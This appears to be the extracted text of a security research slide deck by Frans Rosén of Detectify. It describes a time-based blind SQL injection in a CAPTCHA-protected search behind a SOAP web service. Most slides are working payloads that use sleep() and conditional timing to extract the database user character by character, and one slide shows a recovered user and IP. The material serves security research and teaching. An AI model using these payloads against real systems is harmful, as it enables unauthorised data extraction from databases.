detectifyTime based captcha protected SQL injection through SOAP-webservice

Frans Rosén @fransrosen

detectify

Search + CAPTCHA

detectify

Search for Bobby: '

detectify

Search: '-sleep(5)-'

detectify

CAPTCHA…

https://twitter.com/offensive_image/status/751191306500734976

detectify

Me need

1. DoaclearPoC–getdata2. Asfewrequestsaspossible3. FindALLthestorefronts!4. ???5. PROFIT!!!

detectify

user()

'-sleep((ascii(substring(user(),1,1))-90)/2)-'

detectify

user()

'-sleep((ascii(substring(user(),1,1))-90)/2)-'

(14*2)+90=118==v

detectify

Validate

'-(if(ascii(substring(user(),1,1))=117,sleep(3),1))-(if(ascii(substring(user(),1,1))=118,sleep(6),1))-(if(ascii(substring(user(),1,1))=119,sleep(9),1))-'

===v

detectify

Down on the @

'-sleep((ascii(substring(user(),21,1))-90)/2)-'

detectify

Host search

'-sleep((ascii(substring(user(),21,1))-46)*2)-'

detectify

Host search

0sforadot(T-4)/2 =2'-sleep((ascii(substring(user(),21,1))-46)*2)-'

detectify

Setup

detectify

Result

rawskuiumsal@192.251.68.254

detectify

Result

detectify

Other

https://media.blackhat.com/us-13/US-13-Salgado-SQLi-Optimization-and-Obfuscation-Techniques-WP.pdf

SQLInjectionOptimizationandObfuscationTechniques

detectifyThanks!

Frans Rosén (@fransrosen) – www.detectify.com